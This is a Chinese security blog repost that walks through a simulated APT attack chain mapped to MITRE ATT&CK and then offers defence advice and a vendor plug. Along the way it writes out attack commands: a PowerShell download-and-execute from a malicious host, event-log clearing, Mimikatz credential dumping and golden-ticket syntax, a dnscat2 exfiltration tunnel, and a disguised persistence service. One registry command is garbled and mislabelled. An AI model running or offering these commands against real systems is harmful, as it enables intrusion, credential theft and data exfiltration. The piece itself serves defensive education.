【完美抢劫】一场基于 MITRE ATT&CK 框架的现代 APT 攻击模拟推演

admin 2025年3月6日15:56:10评论18 views字数 2527阅读8分25秒阅读模式

【完美抢劫】一场基于 MITRE ATT&CK 框架的现代 APT 攻击模拟推演

攻击背景:一场精心设计的数字劫案

本文还原了一场基于真实 APT 攻击手法的攻击事件(代号“完美抢劫”)。攻击者通过多阶段协作技术,实现对目标网络的深度渗透。以下流程融合了十大最常用的 ATT&CK 技术,完整呈现了从初始访问到数据泄露的隐蔽的攻击链。

阶段 1:初始访问——钓鱼攻击与无文件加载

攻击链还原

A 金融科技公司的一名财务员工收到了一封看似来自公司 IT 部门的邮件,标题为“紧急:请更新您的安全证书”。邮件附件是一个 Excel 文件,声称包含最新的安全补丁。员工打开文件后,宏代码自动执行无文件攻击命令,通过 PowerShell 脚本从恶意服务器下载并执行加载器脚本。

【完美抢劫】一场基于 MITRE ATT&CK 框架的现代 APT 攻击模拟推演

钓鱼诱导

○ 伪造通知邮件,附件为伪装成 Excel 文档的 HTA 文件(Security_Update.hta

○ 利用社会工程诱导目标启用宏内容

漏洞利用

○ 通过 CVE-2024-XXXX 公式注入漏洞触发 PowerShell 内存加载

○ 执行无文件攻击:IEX (New-Object Net.WebClient).DownloadString('hxxps://cdn[.]malicious[.]com/loader.ps1)

技术对照

  • ATT&CK T1566.001(钓鱼附件)

  • ATT&CK T1059.001(PowerShell 脚本执行)

阶段 2:隐蔽驻留——进程注入与防御规避

攻击链还原

脚本成功加载后,攻击者选择将恶意代码注入 A 公司内部开发的 AI 风控系统进程。该系统具有高权限,能够访问公司核心数据库。为了确保隐蔽性,攻击者还修改系统注册表,禁用 EDR 告警并清除事件日志,确保其活动不被防御系统监控到。

【完美抢劫】一场基于 MITRE ATT&CK 框架的现代 APT 攻击模拟推演

进程注入

○ 将恶意代码注入合法进程ai_engine.exe(企业自研 AI 风控系统)

○ 使用Process Hollowing技术:通过NtUnmapViewOfSection清空目标进程内存

防御规避

○ 修改注册表禁用 EDR 告警:reg add HKLMSOFTWAREPoliciesMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0

○ 清除事件日志:wevtutil cl Security

技术对照

  • ATT&CK T1055.012(进程镂空)

  • ATT&CK T1562.002(禁用 Windows 事件日志)

阶段 3:横向移动——凭证窃取与黄金票据攻击

攻击链还原

攻击者利用 Mimikatz 抓取 LSASS 进程内存,成功获取了域管理员的 NTLM 哈希。随后,他们伪造了 Kerberos 黄金票据,利用这些伪造的凭证通过 SMB 协议横向移动至财务服务器,实现目标系统中的权限提升和进一步的渗透。

【完美抢劫】一场基于 MITRE ATT&CK 框架的现代 APT 攻击模拟推演

凭证提取

○ 通过Mimikatz提取 LSASS 内存中的 NTLM 哈希:sekurlsa::logonpasswords

○ 窃取浏览器保存的 OAuth 令牌(ChromeLogin Data文件解密)

权限提升

○ 伪造 Kerberos 黄金票据:kerberos::golden /user:svc_admin /domain:corp.com /sid:S-1-5-21-1234567890 /aes256:1a2b3c... /ptt

○ 通过 SMB 协议横向移动至财务服务器

技术对照

  • ATT&CK T1555.003(浏览器凭证窃取)

  • ATT&CK T1558.001(黄金票据攻击)

阶段 4:数据外泄——DNS 隐蔽隧道与持久化

攻击链还原

攻击者通过加密隧道隐藏自己的通信,使用 DNScat2 工具通过 DNS 协议进行数据传输。同时,攻击者利用持久化机制,如伪装成 Windows 服务和修改注册表项,确保在系统重启后仍能保持对目标系统的长期控制。此外还通过 DNS TXT 记录不断传输敏感数据。

【完美抢劫】一场基于 MITRE ATT&CK 框架的现代 APT 攻击模拟推演

数据封装

○ 使用开源工具DNScat2建立加密隧道:dnscat2 --dns server=malicious.com,port=53 --secret=MySecureKey

○ 分块传输敏感文件(每块编码为 DNS TXT 记录)

持久化机制

○创建伪装 Windows 服务:sc create "WindowsUpdateHelper" binPath= "C:WindowsTempsvchost.exe" start= auto

○ 注册表启动项+计划任务双保险

技术对照

  • ATT&CK T1071.004(DNS 协议外泄)

  • ATT&CK T1547.001(注册表自启动)

防御启示:构建动态对抗体系

面对如此复杂的攻击链条,企业需要建立全方位的主动防御体系

  1. 零信任控制建立严格的访问控制机制至关重要。企业应对 PowerShell、Python 等高危脚本执行进行严格的上下文感知控制,同时在核心系统中强制实施 TPM 与 HSM 相结合的硬件级认证机制,从根本上保障系统安全。

  2. 行为监控通过部署先进的内存保护技术,有效限制跨进程调用等高危操作;建立 DNS 流量基线分析系统,及时发现异常的 TXT 记录请求等数据外泄行为。这些措施能够有效提升企业对攻击行为的实时发现能力。

  3. 安全验证平台借助专业的安全验证平台进行全方位防护有效性验证是应对复杂攻击的关键。塞讯安全度量验证平台不仅可以模拟完整攻击链路进行持续性安全验证,及时发现防御体系中的薄弱环节,还能够通过自动化验证能力对整体安全防御状态进行实时监测。结合平台丰富的威胁情报数据,企业可以快速更新防御策略以应对新型攻击手法。

  4. 动态防御验证只有建立起持续的防御验证机制,才能确保防御体系的有效性。企业应基于 ATT&CK 框架构建攻击链剧本,定期评估防御措施的实际效果。通过持续性安全验证与完整的验证反馈闭环,不断优化安全防护策略,提升整体安全防护水平。

构建这样一个多层次、动态进化的防御体系,企业才能在日益严峻的网络安全环境中保持充分的安全性。通过我司安全验证平台的持续支撑,企业可以建立起完整的安全防护能力,有效应对各类高级威胁。

文章来源:freebuf

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

原文始发于微信公众号(黑白之道):【完美抢劫】一场基于 MITRE ATT&CK 框架的现代 APT 攻击模拟推演

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月6日15:56:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【完美抢劫】一场基于 MITRE ATT&CK 框架的现代 APT 攻击模拟推演https://cn-sec.com/archives/3803994.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息